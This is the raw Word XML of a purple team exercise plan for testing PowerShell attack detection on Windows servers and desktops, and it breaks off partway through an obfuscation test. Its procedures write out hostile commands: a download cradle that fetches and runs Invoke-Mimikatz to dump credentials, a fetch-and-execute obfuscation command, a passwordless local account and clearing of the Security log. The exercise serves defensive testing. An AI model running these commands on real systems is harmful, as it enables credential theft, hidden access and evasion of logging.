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843C423" w14:textId="6FCAE358" w:rsidR="00140664" w:rsidRPr="00331A9F" w:rsidRDefault="00705AEB" w:rsidP="00140664">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00331A9F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Purple Team Exercise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC834B9" w14:textId="77777777" w:rsidR="00AF46C5" w:rsidRDefault="00023FAE" w:rsidP="00023FAE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ID: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9B9E62" w14:textId="16085A0E" w:rsidR="00023FAE" w:rsidRPr="00886DA9" w:rsidRDefault="00705AEB" w:rsidP="00023FAE">
      <w:r>
        <w:t>PTE-T1059</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0617F524" w14:textId="77777777" w:rsidR="00AF46C5" w:rsidRDefault="00023FAE" w:rsidP="00023FAE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TITLE: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602409F8" w14:textId="52C12A7A" w:rsidR="00023FAE" w:rsidRPr="00886DA9" w:rsidRDefault="008416B5" w:rsidP="00AF46C5">
      <w:r>
        <w:t>PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619F4928" w14:textId="77777777" w:rsidR="00023FAE" w:rsidRDefault="00AF46C5" w:rsidP="00AF46C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>DATE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C66A1C" w14:textId="15AE2B40" w:rsidR="00AF46C5" w:rsidRPr="00886DA9" w:rsidRDefault="00CA7FE4" w:rsidP="00AF46C5">
      <w:r>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="00CB2EC2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Nov </w:t>
      </w:r>
      <w:r w:rsidR="00705AEB">
        <w:t>2020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E18132" w14:textId="77777777" w:rsidR="00AF46C5" w:rsidRDefault="00AF46C5" w:rsidP="00AF46C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>OWNER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2650E1" w14:textId="524DFD59" w:rsidR="00AF46C5" w:rsidRPr="00886DA9" w:rsidRDefault="00CA7FE4" w:rsidP="00AF46C5">
      <w:r>
        <w:t>John Doe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF988FF" w14:textId="77777777" w:rsidR="00AF46C5" w:rsidRDefault="00AF46C5" w:rsidP="00AF46C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5209A6DB" w14:textId="77777777" w:rsidR="00AF46C5" w:rsidRDefault="00AF46C5" w:rsidP="00AF46C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>OBJECTIVE</w:t>
      </w:r>
      <w:r w:rsidR="007456D5">
        <w:t xml:space="preserve"> STATEMENT</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57530217" w14:textId="110D4949" w:rsidR="007456D5" w:rsidRDefault="00705AEB" w:rsidP="00AF46C5">
      <w:r>
        <w:t>Test execution of MITRE ATT&amp;CK technique T1059</w:t>
      </w:r>
      <w:r w:rsidR="004C34B1">
        <w:t>.001</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="008416B5">
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:t>), document effectiveness of prevention &amp; detection, and identify potential areas for improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12159240" w14:textId="609869EE" w:rsidR="00705AEB" w:rsidRPr="00705AEB" w:rsidRDefault="00886DA9" w:rsidP="00705AEB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>SCOPE AND APPLICABILITY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA9FC38" w14:textId="77777777" w:rsidR="004C34B1" w:rsidRDefault="004C34B1" w:rsidP="00886DA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311CA747" w14:textId="162B3178" w:rsidR="00886DA9" w:rsidRPr="00705AEB" w:rsidRDefault="00705AEB" w:rsidP="00886DA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00705AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457BB3E7" w14:textId="7A16548A" w:rsidR="00705AEB" w:rsidRDefault="00CA7FE4" w:rsidP="205F5C7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Internal Windows Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECD40E9" w14:textId="25EFC2F1" w:rsidR="00CA7FE4" w:rsidRDefault="00CA7FE4" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DMZ Windows Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A23CEB" w14:textId="77777777" w:rsidR="00CA7FE4" w:rsidRPr="00CA7FE4" w:rsidRDefault="00CA7FE4" w:rsidP="00CA7FE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Standard Windows Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433533DB" w14:textId="4AC65739" w:rsidR="00705AEB" w:rsidRDefault="00705AEB" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16BA2D47" w14:textId="5C9D13CB" w:rsidR="00705AEB" w:rsidRDefault="008157D4" w:rsidP="00705AEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="205F5C7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Test </w:t>
      </w:r>
      <w:r w:rsidR="004C34B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidR="00705AEB" w:rsidRPr="205F5C7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126ABBD2" w14:textId="249733C1" w:rsidR="00BF1B92" w:rsidRPr="00BF1B92" w:rsidRDefault="293B3468" w:rsidP="205F5C7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add Local User </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3765ACA4" w14:textId="744D0874" w:rsidR="00BF1B92" w:rsidRPr="00BF1B92" w:rsidRDefault="293B3468" w:rsidP="205F5C7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05F5C7F">
        <w:t xml:space="preserve">Clear Event Log of Security Events </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F27A5D0" w14:textId="4EDCE2BB" w:rsidR="00BF1B92" w:rsidRPr="00BF1B92" w:rsidRDefault="293B3468" w:rsidP="205F5C7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="205F5C7F">
        <w:t xml:space="preserve">PowerShell Invoke </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="205F5C7F">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="205F5C7F">
        <w:t xml:space="preserve"> from Remote Source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C15076" w14:textId="2FDFF2C4" w:rsidR="00BF1B92" w:rsidRPr="00BF1B92" w:rsidRDefault="293B3468" w:rsidP="205F5C7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05F5C7F">
        <w:t>Obfuscation Tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129AA9E4" w14:textId="5728B4B4" w:rsidR="00BF1B92" w:rsidRPr="00BF1B92" w:rsidRDefault="293B3468" w:rsidP="205F5C7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205F5C7F">
        <w:t>PowerShell Session Creation and Use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ABEF65" w14:textId="77777777" w:rsidR="00BF1B92" w:rsidRPr="00BF1B92" w:rsidRDefault="00BF1B92" w:rsidP="00BF1B92"/>
    <w:p w14:paraId="43A01387" w14:textId="79866359" w:rsidR="008157D4" w:rsidRPr="008157D4" w:rsidRDefault="008157D4" w:rsidP="00183F0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="072816AC" w14:textId="77777777" w:rsidR="00705AEB" w:rsidRDefault="00705AEB" w:rsidP="00705AEB"/>
    <w:p w14:paraId="29EE27EF" w14:textId="77777777" w:rsidR="00CA7FE4" w:rsidRDefault="00CA7F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4A221D" w14:textId="47F555EC" w:rsidR="00886DA9" w:rsidRDefault="00886DA9" w:rsidP="00886DA9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>METHODOLOGY AND PROCEDURES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3359F360" w14:textId="77777777" w:rsidR="008157D4" w:rsidRDefault="008157D4" w:rsidP="00705AEB"/>
    <w:p w14:paraId="72D45EB3" w14:textId="30803132" w:rsidR="00CA7FE4" w:rsidRPr="00CA7FE4" w:rsidRDefault="00CA7FE4" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Test 1 – Add Local User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5841E4FF" w14:textId="228FD8EA" w:rsidR="00CA7FE4" w:rsidRPr="00CA7FE4" w:rsidRDefault="00CA7FE4" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Add a local user account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FB0118" w14:textId="1FEEFDBA" w:rsidR="00CA7FE4" w:rsidRPr="00CA7FE4" w:rsidRDefault="00CA7FE4" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Open elevated PowerShell window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2265FC98" w14:textId="77777777" w:rsidR="00CA7FE4" w:rsidRPr="00CA7FE4" w:rsidRDefault="00CA7FE4" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Run command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9804E6" w14:textId="0A7404F6" w:rsidR="00CA7FE4" w:rsidRPr="00CA7FE4" w:rsidRDefault="00CA7FE4" w:rsidP="00CA7FE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CC5"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>New-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LocalUser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 xml:space="preserve"> -Name "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PurplePwner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>" -Description "test account" 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NoPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C577946" w14:textId="77777777" w:rsidR="00CA7FE4" w:rsidRPr="00CA7FE4" w:rsidRDefault="00CA7FE4" w:rsidP="00705AEB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64390F6E" w14:textId="4B8124B2" w:rsidR="00CA7FE4" w:rsidRPr="00CA7FE4" w:rsidRDefault="00CA7FE4" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Test 2 – Clear Event Log of Security Events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C11C98C" w14:textId="6BEC17A7" w:rsidR="00CA7FE4" w:rsidRPr="00CA7FE4" w:rsidRDefault="00CA7FE4" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Clear security events from the Windows Event Log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516DF0DA" w14:textId="77777777" w:rsidR="00CA7FE4" w:rsidRPr="00CA7FE4" w:rsidRDefault="00CA7FE4" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Open elevated PowerShell window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BDB1BE" w14:textId="77777777" w:rsidR="00CA7FE4" w:rsidRPr="00CA7FE4" w:rsidRDefault="00CA7FE4" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Run command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655871A1" w14:textId="77F3D518" w:rsidR="00CA7FE4" w:rsidRPr="00CA7FE4" w:rsidRDefault="00CA7FE4" w:rsidP="00CA7FE4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CC5"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>Clear-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EventLog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 xml:space="preserve"> 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LogName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 xml:space="preserve"> Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759EB2AA" w14:textId="77777777" w:rsidR="00CA7FE4" w:rsidRPr="00CA7FE4" w:rsidRDefault="00CA7FE4" w:rsidP="00705AEB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BEE9F5D" w14:textId="43FB6152" w:rsidR="00705AEB" w:rsidRPr="00CA7FE4" w:rsidRDefault="00705AEB" w:rsidP="00705AEB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidR="55815834" w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – Power</w:t>
      </w:r>
      <w:r w:rsidR="008157D4" w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">hell Invoke </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008157D4" w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> from Remote Source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F9C666" w14:textId="12C1CB69" w:rsidR="00BF1B92" w:rsidRPr="00CA7FE4" w:rsidRDefault="00BF1B92" w:rsidP="00705AEB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Download </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> and dump credentials. Upon execution, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> dump details and password hashes will be displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7B84F4" w14:textId="3C8CE22D" w:rsidR="00705AEB" w:rsidRPr="00CA7FE4" w:rsidRDefault="00705AEB" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Open Power</w:t>
      </w:r>
      <w:r w:rsidR="008157D4" w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>hell</w:t>
      </w:r>
      <w:r w:rsidR="008157D4" w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CDB018" w14:textId="5036DFD2" w:rsidR="008157D4" w:rsidRPr="00CA7FE4" w:rsidRDefault="008157D4" w:rsidP="00CA7FE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Run command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64355739" w14:textId="2846EF4B" w:rsidR="008157D4" w:rsidRPr="00CA7FE4" w:rsidRDefault="008157D4" w:rsidP="00740DA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CC5"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell.exe "IEX (New-Object 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Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>).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DownloadString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>('http://bit.ly/L3g1tCrad1e'); Invoke-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Mimikatz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 xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>DumpCr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="005CC5"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4456D1CF" w14:textId="51BBC991" w:rsidR="00D127AF" w:rsidRPr="00CA7FE4" w:rsidRDefault="00D127AF" w:rsidP="008157D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="792D6391" w14:textId="77777777" w:rsidR="0031379D" w:rsidRDefault="0031379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7417BFB" w14:textId="3E19A721" w:rsidR="0031379D" w:rsidRDefault="0031379D" w:rsidP="0031379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lastRenderedPageBreak/>
        <w:t>Test 4 - Obfuscation Tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263E4019" w14:textId="77777777" w:rsidR="0031379D" w:rsidRPr="0031379D" w:rsidRDefault="0031379D" w:rsidP="0031379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</w:pPr>
      <w:r w:rsidRPr="00CA7FE4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Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2DD8EC" w14:textId="77777777" w:rsidR="0031379D" w:rsidRPr="00CA7FE4" w:rsidRDefault="0031379D" w:rsidP="0031379D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22E7A769" w14:textId="77777777" w:rsidR="0031379D" w:rsidRPr="00CA7FE4" w:rsidRDefault="0031379D" w:rsidP="0031379D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Run command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0E1A2C" w14:textId="77777777" w:rsidR="0031379D" w:rsidRPr="00CA7FE4" w:rsidRDefault="0031379D" w:rsidP="0031379D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
        <w:ind w:left="108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New-Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Net.WebClient).DownloadFile(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http://bit.ly/L3g1tCrad1e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Default_File_Path.ps1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);IEX((</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:rStyle w:val="pl-k"/>
          <w:color w:val="D73A49"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-Join</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7FE4">
        <w:rPr>
          <w:color w:val="24292E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
